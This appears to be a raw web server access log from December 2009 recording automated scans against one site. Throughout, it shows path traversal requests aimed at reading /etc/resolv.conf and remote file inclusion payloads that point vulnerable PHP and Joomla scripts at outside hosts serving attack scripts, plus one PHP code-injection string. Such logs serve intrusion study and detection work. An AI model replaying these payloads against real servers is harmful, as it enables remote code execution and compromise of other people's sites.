208.76.107.242 - - [28/Dec/2009:00:32:07 -0800] "GET /main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:32:07 -0800] "GET /logs/access_091123.log//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:32:07 -0800] "GET /logs//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:32:07 -0800] "GET /main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:32:08 -0800] "GET /logs//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:32:13 -0800] "GET /logs/access_090720.log//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:32:13 -0800] "GET /logs/access_090720.log//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:00:32:31 -0800] "GET /logs/access_090817.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:00:32:31 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:00:32:31 -0800] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:32:56 -0800] "GET /logs/access_091026.log//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:32:56 -0800] "GET /logs/access_091026.log//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:33:10 -0800] "GET /logs/access_090713.log//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:33:10 -0800] "GET /logs/access_090713.log//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:33:31 -0800] "GET /logs/access_090817.log//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:33:32 -0800] "GET /logs/access_090817.log//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:33:48 -0800] "GET /logs/access_090706.log//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:33:48 -0800] "GET /logs/access_090706.log//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:34:17 -0800] "GET /logs/access_090615.log//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:34:18 -0800] "GET /logs/access_090615.log//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:34:25 -0800] "GET /logs/access_090824.log//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:00:34:32 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:00:34:46 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:34:50 -0800] "GET /logs/access_090622.log//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:34:51 -0800] "GET /logs/access_090622.log//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:35:59 -0800] "GET /logs/access_090817.log%20//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:35:59 -0800] "GET /logs/access_090817.log%20//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:36:11 -0800] "GET /logs/access_090824.log%20//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:00:36:11 -0800] "GET /logs/access_090824.log%20//main.php?sayfa=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:00:37:04 -0800] "GET /logs/access_090817.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:00:37:04 -0800] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:00:37:04 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:00:37:55 -0800] "GET /logs/access_090824.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
61.106.21.45 - - [28/Dec/2009:00:39:12 -0800] "GET /logs/access_091012.log%20%20//?_PHPLIB[libdir]=http://osban.isfreeweb.com/amboard/////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.106.21.45 - - [28/Dec/2009:00:39:12 -0800] "GET /?_PHPLIB[libdir]=http://osban.isfreeweb.com/amboard/////id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
61.106.21.45 - - [28/Dec/2009:00:39:12 -0800] "GET /logs//?_PHPLIB[libdir]=http://osban.isfreeweb.com/amboard/////id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:00:39:29 -0800] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.191.133.141 - - [28/Dec/2009:00:40:02 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.daemyung-eng.co.kr//bbs/files/log/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.191.133.141 - - [28/Dec/2009:00:40:02 -0800] "GET /Neos_Chronos/header.php?base_folder=http://www.daemyung-eng.co.kr//bbs/files/log/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.191.133.141 - - [28/Dec/2009:00:40:02 -0800] "GET /logs/access_090706.log%20%20//Neos_Chronos/header.php?base_folder=http://www.daemyung-eng.co.kr//bbs/files/log/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:00:40:17 -0800] "GET /?_PHPLIB[libdir]=http://osban.isfreeweb.com/amboard/////id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:00:40:17 -0800] "GET /logs/access_091012.log//?_PHPLIB[libdir]=http://osban.isfreeweb.com/amboard/////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:00:40:17 -0800] "GET /logs//?_PHPLIB[libdir]=http://osban.isfreeweb.com/amboard/////id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
61.106.21.45 - - [28/Dec/2009:00:40:25 -0800] "GET /logs/access_091026.log%20%20//?_PHPLIB[libdir]=http://osban.isfreeweb.com/amboard/////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.191.133.141 - - [28/Dec/2009:00:41:05 -0800] "GET /logs/access_090629.log%20%20//Neos_Chronos/header.php?base_folder=http://www.daemyung-eng.co.kr//bbs/files/log/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.106.21.45 - - [28/Dec/2009:00:42:28 -0800] "GET /logs/access_091012.log//?_PHPLIB[libdir]=http://osban.isfreeweb.com/amboard/////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:00:47:17 -0800] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.191.133.141 - - [28/Dec/2009:00:47:31 -0800] "GET /logs/access_090525.log//Neos_Chronos/header.php?base_folder=http://www.daemyung-eng.co.kr//bbs/files/log/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.191.133.141 - - [28/Dec/2009:00:47:48 -0800] "GET /logs/access_090622.log//Neos_Chronos/header.php?base_folder=http://www.daemyung-eng.co.kr//bbs/files/log/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:00:47:57 -0800] "GET /Neos_Chronos/header.php?base_folder=http://www.daemyung-eng.co.kr//bbs/files/img00.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:00:47:57 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.daemyung-eng.co.kr//bbs/files/img00.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:00:47:57 -0800] "GET /logs/access_090525.log%20%20//Neos_Chronos/header.php?base_folder=http://www.daemyung-eng.co.kr//bbs/files/img00.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:00:48:36 -0800] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:00:49:24 -0800] "GET /logs/access_090914.log%20%20/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:00:49:24 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [28/Dec/2009:00:50:25 -0800] "GET /logs/access_090615.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
75.126.17.250 - - [28/Dec/2009:00:50:31 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:00:50:44 -0800] "GET /logs/access_091123.log%20%20/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.17.250 - - [28/Dec/2009:00:51:08 -0800] "GET /logs/access_091221.log/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:00:51:58 -0800] "GET /logs/access_090921.log%20/errors.php?page=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:00:51:58 -0800] "GET /errors.php?page=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:00:51:58 -0800] "GET /logs/errors.php?page=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:00:52:08 -0800] "GET /logs/access_090921.log/errors.php?page=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:00:52:08 -0800] "GET /errors.php?page=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:00:52:08 -0800] "GET /logs/errors.php?page=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:00:52:13 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:00:52:15 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:00:52:22 -0800] "GET /logs/access.log/errors.php?page=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "galf.org"
61.47.61.97 - - [28/Dec/2009:00:52:22 -0800] "GET /errors.php?page=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "galf.org"
200.93.147.154 - - [28/Dec/2009:00:53:11 -0800] "GET /logs/access_091123.log%20%20/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/12/21/2698014/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.115.1.62 - - [28/Dec/2009:00:54:47 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
208.181.243.6 - - [28/Dec/2009:00:57:12 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://pawznclawz.com/administrator/components/com_jreactions/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.181.243.6 - - [28/Dec/2009:00:57:12 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://pawznclawz.com/administrator/components/com_jreactions/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.181.243.6 - - [28/Dec/2009:00:57:13 -0800] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://pawznclawz.com/administrator/components/com_jreactions/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.61.97 - - [28/Dec/2009:00:57:18 -0800] "GET /errors.php?page=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:00:57:21 -0800] "GET /logs/access_090921.log%20/errors.php?page=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
61.47.61.97 - - [28/Dec/2009:00:57:21 -0800] "GET /logs/errors.php?page=http://www.onskyfarm.com/bbs/icon/private_icon/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
208.80.193.32 - - [28/Dec/2009:01:03:46 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=69&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; PeoplePal 3.0; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbMSNI; MSNmen-us; MSNcIA)" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:07:16 -0800] "GET /ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:07:16 -0800] "GET /logs/access_090629.log//ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:07:21 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:07:32 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:07:32 -0800] "GET /logs/access_091109.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:07:32 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:07:43 -0800] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:07:43 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:07:43 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:07:55 -0800] "GET /ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:07:55 -0800] "GET /ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:07:58 -0800] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:07:58 -0800] "GET /ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:07:58 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:07:58 -0800] "GET /logs/access_090629.log//ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:07:58 -0800] "GET /logs/access_090629.log//ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:07:58 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:08:00 -0800] "GET /logs/access_091214.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:08:00 -0800] "GET /logs/access_091019.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:08:00 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:08:00 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:08:01 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:08:25 -0800] "GET /logs/access_091012.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.62.128.254 - - [28/Dec/2009:01:08:25 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:08:37 -0800] "GET /logs/access_091214.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:08:37 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:08:37 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:08:37 -0800] "GET /logs/access_091019.log%20%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.72 - - [28/Dec/2009:01:08:46 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:08:52 -0800] "GET /logs/access_091214.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:08:52 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:08:52 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [28/Dec/2009:01:08:52 -0800] "GET /logs/access_091019.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:08:59 -0800] "GET /ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:08:59 -0800] "GET /ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:08:59 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:01:08:59 -0800] "GET /logs//ashnews.php?pathtoashnews=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
